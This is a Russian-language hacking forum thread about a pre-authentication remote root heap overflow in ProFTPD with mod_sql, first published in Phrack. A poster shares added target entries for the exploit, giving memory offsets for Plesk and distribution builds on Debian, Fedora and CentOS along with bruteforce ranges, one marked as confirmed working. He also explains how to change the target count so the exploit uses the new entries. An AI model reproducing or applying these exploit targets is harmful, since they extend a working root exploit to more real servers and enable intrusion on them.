ProFTPd 1.3.2rc3 --- 1.3.3b remote exploit

[SynQ]

В новом Phrack выложили 0day: ProFTPD with mod_sql pre-authentication remote root heap overflow

[AloneKiller]

Цитата:

Сообщение от SynQ

В новом Phrack выложили 0day: ProFTPD with mod_sql pre-authentication remote root heap overflow

А можно ссылку?

[BlackFan]

Цитата:

Сообщение от AloneKiller

А можно ссылку?

http://www.phrack.org/issues.html?issue=67&id=7#article

[Acez666]

они там типо рутят 1.3.1 ?

[SynQ]

Нашел версию эксплойта с несколькими новыми оффсетами для некоторых систем, может пригодятся:

Цитата:

["ProFTPD 1.3.2b Debian 4 (Plesk binary)", "Linux",
1,0x0804c920,8189,0],
["ProFTPD 1.3.2b Debian 5 (Plesk binary)", "Linux",
1,0x0804cc60,8189,0],
["ProFTPD 1.3.2e Fedora 11 (Plesk binary)", "Linux",
1,0x0804c2ec,8189,0],
["ProFTPD 1.3.2e Fedora 7 (Plesk binary)", "Linux",
1,0x0804c208,8189,0],
["ProFTPD 1.3.2e Fedora 8 (Plesk binary)", "Linux",
1,0x0804c258,8189,0],
["ProFTPD 1.3.3 Debian 4 (Plesk binary)", "Linux",
1,0x0804ce4c,4101,0],
["ProFTPD 1.3.3 CentOS 4 (Plesk binary)", "Linux",
1,0x0804ced0,4101,0],
["ProFTPD 1.3.3 CentOS 5 (Plesk binary)", "Linux",
1,0x0804c72c,4101,0],
["bruteforce 8189",# PLATFORM SPEC
"Linux", # OPERATING SYSTEM
1, # EXPLOIT STYLE
0x0804A000, # OFFSET START # OFFSET END
8189,
0,
0x0804D000], # ALIGN

#Confirmed to work
["Bruteforce 4101",
"Linux",
1,
0x0804A000,
4101,
0,
0x0804D000],

#
["ProFTPD 1.3.2e CentOS 5 (Distro binary)", "Linux",
1,0x0804A234,4101,12], #not working?

После добавки нужно изменить $numtargets с 13 на 24.